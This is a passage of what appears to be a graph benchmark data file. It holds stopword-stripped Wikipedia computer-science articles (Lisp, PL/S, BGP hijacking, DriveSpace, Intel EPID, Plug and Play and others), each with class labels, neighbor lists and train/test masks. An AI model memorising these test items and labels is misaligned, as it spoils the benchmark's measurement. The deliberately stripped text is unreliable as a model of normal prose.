lexical scoping fundamental distinction lisp languages lisp textual representation program simply human-readable description internal data structures linked lists symbols number characters etc would used underlying lisp system lisp uses implement powerful macro system like macro languages c macro returns code compiled however unlike c macros macros lisp functions exploit full power lisp lisp code structure lists macros built list-processing functions language short anything lisp data structure lisp macros code contrast languages parser output purely internal language implementation manipulated programmer feature makes easy develop efficient languages within languages example common lisp object system implemented cleanly language extension using macros means application needs different inheritance mechanism use different object system stark contrast languages example java support multiple inheritance reasonable way add simplistic lisp implementations list structure directly interpreted run program function literally piece list structure traversed interpreter executing however substantial lisp systems also include compiler compiler translates list structure machine code bytecode execution code run fast code compiled conventional languages c. macros expand compilation step thus offer interesting options program needs precomputed table macro might create table compile time compiler need output table need call code create table run time lisp implementations even mechanism codice_3 allows code present compile time macro would need present emitted module lisp languages often used interactive command line may combined integrated development environment ide user types expressions command line directs ide transmit lisp system lisp reads entered expressions evaluates prints result reason lisp command line called read–eval–print loop repl basic operation repl follows simplistic description omits many elements real lisp quoting macros function accepts textual s-expressions input parses internal data structure instance type text prompt translates linked list three elements symbol number 1 number 2 happens list also valid piece lisp code evaluated car list names function—the addition operation note read single symbol read number one hundred twenty-three read string 123 function evaluates data returning zero lisp data result evaluation mean interpretation lisp systems compile every expression native machine code simple however describe evaluation interpretation evaluate list whose car names function first evaluates arguments given cdr applies function arguments case function addition applying argument list yields answer result evaluation symbol evaluates value symbol foo data like string 123 evaluates string list evaluates list 1 2 3 job function represent output user simple result trivial expression evaluated piece list structure would require traverse list print s-expression implement lisp repl necessary implement three functions infinite-loop function naturally implementation complex since must also implement special operators like done basic repl one line code lisp repl typically also provides input editing input history error handling interface debugger lisp usually evaluated eagerly common lisp arguments evaluated applicative order 'leftmost innermost scheme order arguments undefined leaving room optimization compiler lisp originally control structures many added language evolution lisp original conditional operator precursor later structures programmers scheme dialect often express loops using tail recursion scheme commonality academic computer science led students believe tail recursion common way write iterations lisp incorrect oft-seen lisp dialects imperative-style iteration constructs scheme loop common lisp complex expressions moreover key issue makes objective rather subjective matter scheme makes specific requirements handling tail calls thus reason use tail recursion generally encouraged scheme practice expressly supported language definition contrast ansi common lisp require optimization commonly termed tail call elimination thus fact tail recursive style casual replacement use traditional iteration constructs discouraged common lisp matter stylistic preference potentially one efficiency since apparent tail call common lisp may compile simple jump program correctness since tail recursion may increase stack use common lisp risking stack overflow lisp control structures special operators equivalent languages syntactic keywords expressions using operators surface appearance function calls differ arguments necessarily evaluated—or case iteration expression may evaluated contrast major programming languages lisp allows implementing control structures using language several control structures implemented lisp macros even macro-expanded programmer wants know work common lisp scheme operators non-local control flow differences operators deepest differences two dialects scheme supports re-entrant continuations using procedure allows program save later restore particular place execution common lisp support re-entrant continuations support several ways handling escape continuations often algorithm expressed lisp either imperative functional style noted scheme tends favor functional style using tail recursion continuations express control flow however imperative style still quite possible style preferred many common lisp programmers may seem familiar programmers used structured languages c preferred schemers closely resembles pure-functional languages haskell lisp early heritage list processing wide array higher-order functions relating iteration sequences many cases explicit loop would needed languages like loop c lisp task accomplished higher-order function true many functional programming languages good example function scheme called common lisp called given function one lists applies function successively lists elements order collecting results new list applies function corresponding pair list elements yielding result examples common lisp code basic hello world program lisp syntax lends naturally recursion mathematical problems enumeration recursively defined sets simple express notation evaluate number factorial alternative implementation takes less stack space previous version underlying lisp system optimizes tail recursion contrast iterative version uses common lisp macro following function reverses list lisp built-in reverse function thing various object systems models built top alongside lisp including",
    "neighbors": [
      4097,
      4101,
      2056,
      8201,
      2062,
      6160,
      2069,
      4122,
      8221,
      8226,
      50,
      2102,
      2105,
      58,
      8258,
      8262,
      6228,
      10324,
      6242,
      8291,
      8293,
      6248,
      8303,
      6274,
      2179,
      10387,
      10406,
      2225,
      10435,
      205,
      219,
      10463,
      6369,
      228,
      8421,
      10470,
      6378,
      8430,
      242,
      8435,
      2304,
      10510,
      8474,
      2335,
      8479,
      2352,
      305,
      10547,
      311,
      10559,
      8524,
      335,
      10581,
      2392,
      10584,
      8549,
      6502,
      8554,
      8558,
      372,
      377,
      10618,
      2438,
      8582,
      10630,
      393,
      4492,
      6556,
      6557,
      8606,
      8609,
      4516,
      428,
      8628,
      443,
      6594,
      4548,
      8644,
      4550,
      6603,
      10703,
      2519,
      10712,
      477,
      479,
      10739,
      2557,
      511,
      512,
      10752,
      2577,
      6673,
      10771,
      8728,
      4633,
      10778,
      541,
      10796,
      2617,
      6717,
      6718,
      577,
      8771,
      8775,
      4684,
      10841,
      2660,
      2666,
      6767,
      6772,
      10868,
      6775,
      2691,
      655,
      6810,
      4774,
      4777,
      8879,
      4786,
      8883,
      692,
      6840,
      4799,
      10953,
      8908,
      4838,
      4846,
      10991,
      2808,
      6906,
      4865,
      4867,
      6919,
      11028,
      6933,
      791,
      2849,
      6950,
      823,
      6969,
      11083,
      847,
      4943,
      6994,
      11090,
      2903,
      11098,
      2936,
      9080,
      4992,
      9103,
      2964,
      7076,
      5031,
      9128,
      5033,
      11184,
      3002,
      963,
      11218,
      11219,
      7128,
      3034,
      11226,
      989,
      7144,
      3051,
      7147,
      11255,
      11269,
      9224,
      9231,
      7184,
      7189,
      9245,
      11310,
      3119,
      3132,
      3144,
      9299,
      11361,
      7267,
      1130,
      7274,
      11370,
      7281,
      9330,
      7292,
      5245,
      11390,
      9345,
      1159,
      3212,
      7326,
      9385,
      1203,
      7386,
      1244,
      7392,
      11488,
      11495,
      9454,
      5360,
      5361,
      7421,
      3334,
      3336,
      5395,
      1301,
      3350,
      11555,
      3370,
      1333,
      3389,
      3408,
      3412,
      1365,
      3413,
      11625,
      7531,
      3442,
      3446,
      1399,
      7550,
      3462,
      7562,
      11659,
      5519,
      11674,
      1435,
      1448,
      5546,
      7612,
      7616,
      5569,
      1474,
      3529,
      1492,
      5593,
      1501,
      5611,
      7662,
      9714,
      7670,
      5633,
      5634,
      1552,
      5651,
      9749,
      3613,
      1568,
      5677,
      5684,
      9780,
      1591,
      9783,
      7749,
      5703,
      1610,
      1611,
      1613,
      5711,
      3675,
      3698,
      5751,
      3705,
      7805,
      9865,
      9875,
      3733,
      9877,
      5783,
      1702,
      5803,
      7852,
      9911,
      7867,
      9926,
      7880,
      5833,
      5837,
      7889,
      5852,
      7904,
      9960,
      1776,
      5872,
      9969,
      3831,
      9975,
      1790,
      1804,
      10012,
      3869,
      5917,
      3871,
      3876,
      7981,
      7983,
      3904,
      8002,
      10083,
      5997,
      3960,
      8057,
      10104,
      6016,
      6020,
      8069,
      8082,
      1947,
      6047,
      1952,
      10145,
      1953,
      1956,
      10149,
      1963,
      1976,
      6074,
      6102,
      10198,
      8173,
      10228,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6503,
    "label": 9,
    "text": "IBM_PL/S:ibm pl/s pl/s short programming language/systems machine-oriented programming language based pl/i developed ibm late 1960s name basic systems language bsl replacement assembly language internal software projects included support inline assembly explicit control register usage early projects using pl/s batch utility iehmove time sharing option mvt tso 1970s ibm rewriting flagship operating system pl/s although users frequently asked ibm release pl/s use ibm refused saying product proprietary concern open pl/s would give competitors amdahl itel national advanced systems storage technology corporation trilogy systems magnuson computer systems fujitsu hitachi pcm vendors competitive advantage however even though refused make available compiler shipped pl/s source code large parts os customers many thus became familiar reading closed pl/s meant ibm could easily modify enhance operating system pl/s succeeded pl/s ii pl/as programming language/advanced systems pl/x programming language/cross systems pl/ds programming language/distributed systems closely related language used develop dppx operating system pl/ds ii port s/370 architecture dppx/370 port market computers software shifted away ibm mainframes mvs ibm recanted offered current versions pl/s selected customers isvs developer partner program fully compliant pl/s compiler developed fujitsu ltd late-1970s using ibm pl/i optimizer compiler source code starting point pl/s compiler used internally fujitsu also external affiliates whether ibm aware improper use licensed intellectual property known phase names pl/s compiler corresponding phase names ibm pl/i optimizer compiler initial ibm phase name replaced initial j japan ibm copyright notices within modules deleted hide true origin ownership",
    "neighbors": [
      477,
      868,
      4998,
      8262,
      9911,
      7053,
      9137,
      7507,
      9139,
      9331,
      8502,
      9619,
      2168,
      9977,
      5562,
      3323,
      9820,
      2813
    ],
    "mask": "Test"
  },
  {
    "node_id": 6504,
    "label": 4,
    "text": "BGP_hijacking:bgp hijacking bgp hijacking sometimes referred prefix hijacking route hijacking ip hijacking illegitimate takeover groups ip addresses corrupting internet routing tables maintained using border gateway protocol bgp internet global network enabling connected host identified unique ip address talk anywhere world achieved passing data one router another repeatedly moving packet closer destination hopefully delivered router must regularly supplied up-to-date routing tables global level individual ip addresses grouped together prefixes prefixes originated owned autonomous system routing tables ases maintained using border gateway protocol bgp group networks operate single external routing policy known autonomous system example sprint verizon unique identifier number bgp standard routing protocol used exchange information ip routing autonomous systems uses bgp advertise prefixes deliver traffic example network prefix 192.0.2.0/24 inside 64496 advertise provider and/or peer deliver traffic destined 192.0.2.0/24 although security extensions available bgp third-party route db resources exist validating routes default bgp protocol designed trust route announcements sent peers isps rigorously enforce checks bgp sessions ip hijacking occur deliberately accident one several ways common ways disruption normal routing network packets end forwarded towards wrong part network either enter endless loop discarded found mercy offending typically isps filter bgp traffic allowing bgp advertisements downstream networks contain valid ip space however history hijacking incidents shows always case resource public key infrastructure rpki designed authenticate route origins via cryptographic certificate chains demonstrating address block range ownership widely deployed yet deployed ip hijacking errant issues origin via accident intent detectable filterable ip hijacking sometimes used malicious users obtain ip addresses use spamming distributed denial-of-service ddos attack like tcp reset attack session hijacking involves intrusion ongoing bgp session i.e. attacker successfully masquerades one peers bgp session requires information needed accomplish reset attack difference session hijacking attack may designed achieve simply bringing session bgp peers example objective may change routes used peer order facilitate eavesdropping black holing traffic analysis default ebgp peers attempt add routes received another peer device routing table attempt advertise nearly routes ebgp peers problem multi-homed organizations inadvertently advertise prefixes learned one another causing end customer become new best-path prefixes question example customer cisco router peering say verizon using filtering automatically attempt link two major carriers could cause providers prefer sending traffic customer perhaps t1 instead using high-speed dedicated links problem affect others peer two providers also cause ass prefer misconfigured link reality problem hardly ever occurs large isps isps tend restrict end customer advertise however isp filtering customer advertisements allow errant information advertised global routing table affect even large tier-1 providers concept bgp hijacking revolves around locating isp filtering advertisements intentionally otherwise locating isp whose internal isp-to-isp bgp session susceptible man-in-the-middle attack located attacker potentially advertise prefix want causing traffic diverted real source towards attacker done either overload isp attacker infiltrated perform dos impersonation attack entity whose prefix advertised uncommon attacker cause serious outages including complete loss connectivity early 2008 least eight us universities traffic diverted indonesia 90 minutes one morning attack kept mostly quiet involved also february 2008 large portion youtube address space redirected pakistan pta decided block access site inside country accidentally blackholed route global bgp table filtering md5/ttl protection already available bgp implementations thus preventing source attacks problem stems concept isps rarely ever filter advertisements isps common efficient way determine list permissible prefixes originate penalty allowing errant information advertised range simple filtering other/larger isps complete shutdown bgp session neighboring isp causing two isps cease peering repeated problems often end permanent termination peering agreements also noteworthy even causing major provider block shutdown smaller problematic provider global bgp table often reconfigure reroute traffic available routes peers take action errant isp fixes problem source one useful offshoot concept called bgp anycasting frequently used root dns servers allow multiple servers use ip address providing redundancy layer protection dos attacks without publishing hundreds server ip addresses difference situation point advertising prefix actually access real data dns case responds correctly end user requests",
    "neighbors": [
      5024,
      2085,
      2409,
      7248,
      87,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 6505,
    "label": 2,
    "text": "Nokia_X6-00:nokia x6-00 nokia x6 music-oriented capacitive touchscreen smartphone portable entertainment device nokia announced early september 2009 nokia world 2009 germany x6 replaces nokia 5800 nokia flagship music-centred model still slot high-end touchscreen models like nokia n97 x6 nokia x3-00 first devices newly installed nokia xseries xseries nokia music-centred devices branded xpressmusic x6 x3 introduced day nokia launched new simpler naming strategy one number series letter original x6 includes comes music program licence unlimited free downloads nokia music store comes music version shipped late 2009 estimated retail price £529.99 €605 name later reused hmd global new android smartphone nokia x6 2018 version without comes music support €200 less released 23 february 2010 version 16 gb on-board storage another cheaper variation x6 also without comes music support released nokia mid-2010 version 8 gb on-board storage released asia north america 32 gb version released india instead 8 gb 16 gb versions provided ovi music unlimited offer x6 notable slimmer body 5800 13.8 mm 35 hours continuous music playback fast 3g network social networking supports easy access facebook myspace ovi yahoo im youtube vk windows live new software update released nokia x6-00 version 40.0.002 brings new version ovi maps ovi store improved browser improved chat ovi contacts however updates possible via phone require windows computer perform nokia willing update devices mail windows pc hobbyists provided unofficial symbian anna firmware releases",
    "neighbors": [
      1537,
      8577,
      6276,
      3205,
      11271,
      11655,
      4365,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      1833,
      3626,
      5290,
      10410,
      9137,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1216,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      4704,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 6506,
    "label": 2,
    "text": "DriveSpace:drivespace drivespace initially known doublespace disk compression utility supplied ms-dos starting version 6.0 1993 purpose drivespace increase amount data user could store disks transparently compressing decompressing data on-the-fly primarily intended use hard drives use floppy disks also supported common usage scenario user would one hard drive computer space allocated one partition usually drive c software would compress entire drive contents one large file root partition booting system driver would allocate large file drive c enabling files accessed normal microsoft decision add disk compression ms-dos 6.0 influenced fact competing dr dos earlier started include disk compression software since version 6.0 1991 instead developing product scratch microsoft licensed technology doubledisk product developed vertisoft adapted become doublespace instance loading driver controlling compression/decompression dblspace.bin became deeply integrated operating system loaded undocumented pre-load api even config.sys file microsoft originally sought license technology stac electronics similar product called stacker negotiations failed microsoft later successfully sued patent infringement stac electronics violating compression patents court case stac electronics claimed microsoft refused pay money attempted license stacker offering possibility stac electronics develop enhancement products computer programs particularly games incompatible doublespace effectively bypassed doublespace driver doublespace also consumed significant amount conventional memory making difficult run memory-intensive programs shortly release reports data loss emerged company called blossom software claimed found bug could lead data corruption bug occurred writing files heavily fragmented disks demonstrated program called bust.exe company sold program called doublecheck could used check fragmentation condition could lead error microsoft position error occurred unlikely conditions fixed problem ms-dos 6.2 fragmentation condition related way doublespace compresses individual clusters size say 8k fits disk occupying fewer sectors size 512 bytes fixed number required without doublespace 16 sectors example created possibility kind internal fragmentation issue doublespace would unable find enough consecutive sectors storing compressed cluster even plenty space available potential causes data loss included corruption doublespace memory areas programs doublespace memory areas protected ms-dos ran real mode microsoft attempted remedy ms-dos 6.2 version doublespace via feature called doubleguard would check corruption fact compressed contents compressed drive stored single file implied possibility user accidentally deleting his/her data deleting file could happen user inadvertently got access host drive containing file host drive usually mapped letter h compression driver however compression driver failed load user might see drive c turning computer doublespace could finish updating data structures could also result data loss problem compounded microsoft making write caching enabled default smartdrv disk cache software came ms-dos 6.0 change exiting application ms-dos prompt might appear data written disk however due lack controlled shutdown procedure found modern operating systems many users saw appearance ms-dos prompt indication safe switch computer typically case prior ms-dos 6.0 microsoft addressed issue ms-dos 6.2 write caching still enabled default cache would flushed allowing command prompt reappear addstor inc. offered add-on product called double tools doublespace contained number tools enhance functions version doublespace came ms-dos 6.0 included various diagnostic features ability compressed removable media auto-mounted used well support background defragmentation doublespace compressed drives defragment files background possible let doubletools replace low-level doublespace driver dblspace.bin one supplied doubletools replacing driver also enabled enhanced functionality product use 32-bit code paths detected intel 80386 higher cpu caching capabilities addition supporting use upper memory area also permitted use extended memory buffers reducing driver total footprint conventional upper memory albeit cost somewhat reduced speed another function ability split compressed volume multiple floppy disks able see entire volume first disk inserted prompted change discs necessary also possible share compressed volume remote computer double tools also capability put special utility compressed floppy disks made possible access compressed data even computers n't doublespace double tools vertisoft company developed doubledisk program microsoft subsequently licensed turned doublespace developed sold doublespace add-on program called spacemanager contained number usability enhancements also offered improved compression ratios products like later versions stacker stac electronics capable converting existing doublespace compressed drives format ms-dos 6.2 featured new improved version doublespace ability remove doublespace added program scandisk introduced release able scan non-compressed compressed drives including checks internal doublespace structures security features known doubleguard added prevent memory corruption leading data loss memory footprint doublespace driver reduced compared version shipped ms-dos 6.0 fix made fragmentation issue discussed following successful lawsuit stac electronics regarding demonstrated patent infringement microsoft released ms-dos 6.21 without doublespace court injunction also prevented distribution previous versions ms-dos included doublespace ms-dos 6.22 contained reimplemented version disk compression software time released name drivespace software essentially identical ms-dos 6.2 version doublespace user point view compatible previous versions windows 95 full support doublespace/drivespace via native 32-bit driver accessing compressed drives along graphical version software tools ms-dos drivespace users could upgrade windows 95 without troubles furthermore microsoft plus windows 95 pack contained version 3 drivespace version introduced new compression formats hipack ultrapack different performance characteristics even greater compression ratios along tool could recompress files disk using different formats depending frequently files used one could upgrade drivespace 2 drivespace 3 downgrade path back drivespace 2 one could however decompress drivespace 3 drive dos device driver drivespace 3 memory footprint around 150 kb new features caused difficulty users rebooting ms-dos mode windows 95 running games reduced amount conventional memory available drivespace 3 also shipped windows 95 osr2 many features disabled unless plus also installed drivespace could also used fat32 making little use pcs large hard drives windows 98 shipped drivespace 3 part operating system functionality windows 95 plus removal real mode support fat32 going mainstream decreasing popularity drivespace drivespace windows limited support drivespace longer supported hard disk compression still supported reading writing compressed removable media although drivespace operation supported beside deleting reallocating compressed drives possible restore full function drivespace 3 unofficially windows copying executable file windows 98 installation using replace executable included windows one could compress new drives could windows 98 dmsdos linux kernel driver developed late 1990s support reading writing doublespace/drivespace disks however reading especially writing compressed filesystems reliable specific versions 2.0 2.1 2.2 versions kernel dr-dos supported disk compression technology originally based superstor later stacker novell dos 7 1993 higher introduced emulation undocumented pre-load api order provide seamless support doublespace well since dr-dos drivers dpms-enabled whereas ms-dos one offer advantages dr-dos users allowed easier coexistence migration due possibility shared use already existing compressed volumes multi-boot scenarios dr-dos 7.02 higher also added support drivespace 1998",
    "neighbors": [
      11270,
      2568,
      5643,
      4624,
      6674,
      537,
      8729,
      540,
      3102,
      8227,
      8740,
      1577,
      6697,
      10281,
      9780,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      8301,
      622,
      1647,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8834,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      7847,
      2221,
      5293,
      178,
      5300,
      7351,
      7356,
      2749,
      10428,
      2755,
      2244,
      8391,
      200,
      9420,
      1741,
      9936,
      1750,
      9946,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      4850,
      7411,
      3834,
      6396,
      1791,
      11519,
      3856,
      3351,
      8473,
      11546,
      8988,
      808,
      3881,
      5928,
      10024,
      10026,
      10029,
      7983,
      10033,
      9525,
      10039,
      6972,
      5437,
      7486,
      3394,
      8517,
      3922,
      4439,
      4441,
      5465,
      2402,
      2919,
      4458,
      9066,
      3953,
      9593,
      2943,
      3970,
      10631,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      4001,
      11683,
      3496,
      430,
      7088,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      9166,
      3535,
      8659,
      5080,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      2545,
      6641,
      11249,
      8692,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 6507,
    "label": 7,
    "text": "Abacus_Data_Systems:abacus data systems abacus data systems dba abacusnext american software private cloud services provider headquartered san diego california abacusnext offers following abacus private cloud private cloud sold desktop-as-a-service within windows server 2012 r2 environment service relies veeam software backup support built intel-based architecture private cloud service colocated across three carrier-neutral data centers interconnected via self-run optical network data centers scalematrix san diego california skybox houston one houston texas supernap switch las vegas nevada abacusnext offers four windows-based platforms rely relational database management system two law practice management software lawyers abacuslaw uses advantage database amicus attorney uses microsoft sql server.. abacusnext two platforms accounting firms rely microsoft sql server resultscrm customer relationship management quickbooks officetools practice management software december 2015 american private equity investment firm providence equity partners took strategic majority investment abacusnext abacus data systems time",
    "neighbors": [
      9682,
      4194,
      8566,
      11030
    ],
    "mask": "Test"
  },
  {
    "node_id": 6508,
    "label": 2,
    "text": "Smeegol_Linux:smeegol linux smeegol linux new meego opensuse linux-based open source mobile operating system made available novell opensuse goblin team name smeegol linux linux distribution combines opensuse meego netbook oriented user interface get new linux distribution designed netbooks makes smeegol linux unique compared upstream meego opensuse distribution core based opensuse meego user experience well changes adding mono-based banshee media player networkmanager-powered network configuration newer version evolution express range social networking features facebook twitter myspace flickr digg plus firefox chromium web browsers already pre-installed end-users also build customized smeegol linux os using suse studio",
    "neighbors": [
      7938,
      5380,
      7812,
      8326,
      11271,
      4360,
      4364,
      4493,
      6797,
      2195,
      11155,
      1813,
      10780,
      6301,
      1694,
      4383,
      3618,
      3626,
      4011,
      9646,
      7727,
      3248,
      5681,
      7857,
      823,
      7483,
      9660,
      10817,
      7492,
      5067,
      7246,
      4305,
      2259,
      8147,
      7253,
      3542,
      5078,
      3162,
      607,
      10080,
      1761,
      5989,
      8423,
      5096,
      4841,
      10215,
      6763,
      5356,
      2925,
      10599,
      495,
      499,
      5363,
      8315,
      8316,
      8829,
      11391
    ],
    "mask": "Train"
  },
  {
    "node_id": 6509,
    "label": 4,
    "text": "Enhanced_privacy_ID:enhanced privacy id enhanced privacy id epid intel corporation ’ recommended algorithm attestation trusted system preserving privacy incorporated several intel chipsets since 2008 intel processors since 2011 rsac 2016 intel disclosed shipped 2.4b epid keys since 2008 epid complies international standards iso/iec 20008 20009 trusted computing group tcg tpm 2.0 authentication intel contributed epid intellectual property iso/iec rand-z terms intel recommending epid become standard across industry use authentication devices internet things iot december 2014 announced licensing technology third-party chip makers broadly enable use epid enhancement direct anonymous attestation daa algorithm daa digital signature algorithm supporting anonymity unlike traditional digital signature algorithms entity unique public verification key unique private signature key daa provides common group public verification key associated many typically millions unique private signature keys daa created device could prove external party kind device optionally software running device without needing provide device identity i.e. prove authentic member group without revealing member epid enhances daa providing additional utility able revoke private key given signature created key even key still unknown 1999 pentium iii added processor serial number psn way create identity security endpoints internet however privacy advocates especially concerned intel chose remove feature later versions building improving asymmetric cryptography time group keys intel labs researched standardized way get benefits psn preserving privacy three roles using epid issuer member verifier issuer entity issues unique epid private keys member group member entity trying prove membership group verifier entity checking epid signature establish whether signed entity device authentic member group current usage intel intel key generation facility issuer intel-based pc embedded epid key member server possibly running cloud verifier behalf party wishes know communicating trusted component device issuing epid key done directly issuer creating epid key delivering securely member blinded issuer know epid private key epid keys embedded devices ship advantage usages epid available inherently devices arrive field epid key issued using blinded protocol advantage usages since never question whether issuer knew epid key device option one epid key device time shipment use key prove another issuer valid device get issued different epid key using blinded issuing protocol recent years epid used attestation applications platforms used protected content streaming financial transactions also used attestation software guard extensions sgx released intel 2015 anticipated epid become prevalent iot inherent key distribution processor chip optional privacy benefits especially valued example usage epid prove device genuine device verifier wishing know part genuine would ask part sign cryptographic nonce epid key part would sign nonce also provide proof epid key revoked verifier checking validity signature proof would know part genuine epid proof anonymous unlinkable epid used attest platform securely stream digital rights management drm -protected content minimum level hardware security intel insider program uses epid platform attestation rights-holder data protection technology dpt transactions product 2-way authentication point sale pos terminal backend server based epid keys using hardware roots trust based epid authentication initial activation provisioning pos terminal securely performed remote server general epid used basis securely provision cryptographic key material air wire method securing iot epid used provide authentication also preserving privacy epid keys placed devices manufacturing ideal provisioning keys services device epid keys used devices services allowing users tracked iot devices using services yet required known transaction used application user choose require transaction unambiguously known e.g. financial transaction epid used persistent identity anonymity whereas alternative approaches exist persistent identity difficult convert persistent identity anonymous identity epid serve requirements enable anonymous identity mode operation enables persistence well thus epid ideal broad range anticipated iot uses security privacy foundational iot since iot security privacy extend beyond intel processors chipmaker processors sensors intel announced december 9 2014 intent license epid broadly chip manufacturers internet things applications august 18 2015 intel jointly announced licensing epid microchip atmel showed running microchip microcontroller intel developers forum internet things described network networks internal workings one network may appropriate disclose peer foreign network example use case involving redundant spare iot devices facilitates availability serviceability objectives network operations load balances replaces different devices need reflected peer foreign networks share device across network contexts peer expects particular type service data structure likely n't need know device failover replacement repair epid used share common public key certificate describes attests group similar devices used redundancy availability n't allow tracking specific device movements many cases peer networks want track movements would require potentially maintaining context involving multiple certificates device lifecycles privacy also consideration details device maintenance failover load balancing replacement inferred tracking authentication events epid privacy preserving properties ideal iot device identity allow device securely automatically onboard iot service immediately first power device essentially device performs secure boot anything else reaches across internet find iot service new owner chosen managing device epid attestation integral initial communication consequence epid attestation secure channel created device iot service epid attestation iot service knows talking real iot device using secure channel created reciprocal attestation iot device knows talking iot service new owner selected manage unlike pki key unchanging transaction transaction adversary lurking network see correlate traffic key used epid employed thus privacy onboarding preserved adversaries longer collect data create attack maps later use future iot device vulnerabilities discovered moreover additional keys securely provisioned air wire latest version software perhaps specific iot service downloaded default logins disabled secure iot device without operator intervention october 3rd 2017 intel announced intel® secure device onboard software solution help iot device manufacturers iot cloud services privately securely quickly onboard iot devices iot services objective onboard device iot platform superior onboarding experience ecosystem enablement roi",
    "neighbors": [
      8674,
      8302,
      10831,
      2416,
      1941,
      503,
      1368,
      7354
    ],
    "mask": "Test"
  },
  {
    "node_id": 6510,
    "label": 3,
    "text": "Legacy_Plug_and_Play:legacy plug play term legacy plug play also shortened pnp describes series specifications microsoft windows features geared towards operating system configuration devices standards primarily aimed ibm pc standard bus later dubbed industry standard architecture isa related specifications also defined common external specialist busses commonly attached via isa time development including rs-232 parallel port devices windows feature plug play refers operating system functionality supports connectivity configuration management native plug play devices originally considered part feature set specifications plug play context refers primarily responsibilities interfaces associated windows driver development plug play allows detection devices without user intervention occasionally minor configuration device resources i/o ports device memory maps pnp specific set standards confused generic term plug play describes hardware specification alleviates need user configuration device resources plug play standard requires configuration devices handled system firmware provides details resources allocations operating system process invoked boot time computer first turned compatible devices identified assigned non-conflicting addresses interrupt request numbers term adopted microsoft reference windows 95 product operating systems amigaos autoconfig mac os nubus system already supported features time various names name even yggdrasil linux advertised plug play linux least 2 years windows 95 term plug play gradually became universal due worldwide acceptance windows typically non-pnp devices need identified computer bios setup pnp system reassign devices problems interactions legacy non-pnp devices pnp system cause fail leading technology historically referred plug pray legacy plug play defined microsoft intel specifications proposed changes legacy hardware well bios support operating system-bound discovery devices roles later assumed acpi standard also moves support power management configuration operating system opposed firmware previously required plug play bios apm specifications following standards compose microsoft describe legacy plug play opposed native plug-and-play specifications pci usb apart plug play bios specification standards still supported microsoft however support opposed advanced configuration power interface removed future version windows use plug play three requirements met plug-and-play hardware typically also requires sort id code supply order computer software correctly identify id code system integrated early industry standard architecture isa hardware common pcs plug play first introduced isa plug play caused greatest difficulties made pnp initially unreliable led derisive term plug pray since i/o addresses irq lines often set incorrectly early days later computer buses like mca eisa pci becoming industry standard time integrated functionality finally operating system computer needs able handle changes typically means looking interrupts bus saying configuration changed reading information bus locate happened older bus designs often required entire system read order locate changes time consuming lots devices modern designs use sort system either reduce eliminate hunt example usb uses hub system purpose change located os examines information device figure load appropriate device drivers order make work past all-or-nothing affair modern operating systems often include ability find proper driver internet install automatically",
    "neighbors": [
      576,
      11297,
      10371,
      3272,
      6697,
      1515,
      780,
      6797,
      7983,
      5457,
      3250,
      8561,
      8625,
      3445,
      9686,
      5368,
      3548
    ],
    "mask": "Test"
  },
  {
    "node_id": 6511,
    "label": 2,
    "text": "WQL:wql windows management instrumentation query language wql microsoft implementation cim query language cql query language common information model cim standard distributed management task force dmtf subset ansi standard sql minor semantic changes wql dedicated wmi designed perform queries cim repository retrieve information get event notifications example following wql query selects drives computer less 2 mb free space",
    "neighbors": [
      4771,
      10413,
      11344,
      1079,
      6168
    ],
    "mask": "Test"
  },
  {
    "node_id": 6512,
    "label": 5,
    "text": "Call_Admission_Control:call admission control call admission control cac prevents oversubscription voip networks used call set-up phase applies real-time media traffic opposed data traffic cac mechanisms complement distinct capabilities quality service tools protect voice traffic negative effects voice traffic keep excess voice traffic network since averts voice traffic congestion preventive congestion control procedure ensures enough bandwidth authorized flows integrated services rsvp reserve resources flow packets network using controlled-load service ensures call set supported cac rejects calls either insufficient cpu processing power upstream downstream traffic exceeds prespecified thresholds number calls handled exceeds specified limit connection admission control cac used prevent congestion connection-oriented protocols atm context several schemes available however voip differs uses rtp udp ip connectionless protocols",
    "neighbors": [
      5472,
      835,
      9381,
      2827,
      5972,
      11413,
      10171
    ],
    "mask": "Test"
  },
  {
    "node_id": 6513,
    "label": 4,
    "text": "AdGuard:adguard adguard line ad blocking privacy protection software comprises open-source shareware products protect microsoft windows linux os x android ios users unwanted ads pop-ups banners well tracking obscene content malware phishing cross-platform utility adguard also available extension widely used browsers mozilla firefox google chrome opera safari yandex.browser microsoft edge 5 million people reported using software 2018 adguard software limited founded 2009 based cyprus company products earned positive feedback several industry publications series policies google apple app stores occurred 2014 2018 impeded user access adguard mobile applications adguard products include several browser extensions server-side solutions including adguard developers taken non-commercial research order inform wider audiences user privacy cybersecurity data protection following issues notable cases involving developers",
    "neighbors": [
      5536,
      2818,
      4326,
      5254,
      138,
      5612,
      6797,
      2611,
      823,
      10392,
      7515,
      8413,
      4830
    ],
    "mask": "None"
  },
  {
    "node_id": 6514,
    "label": 4,
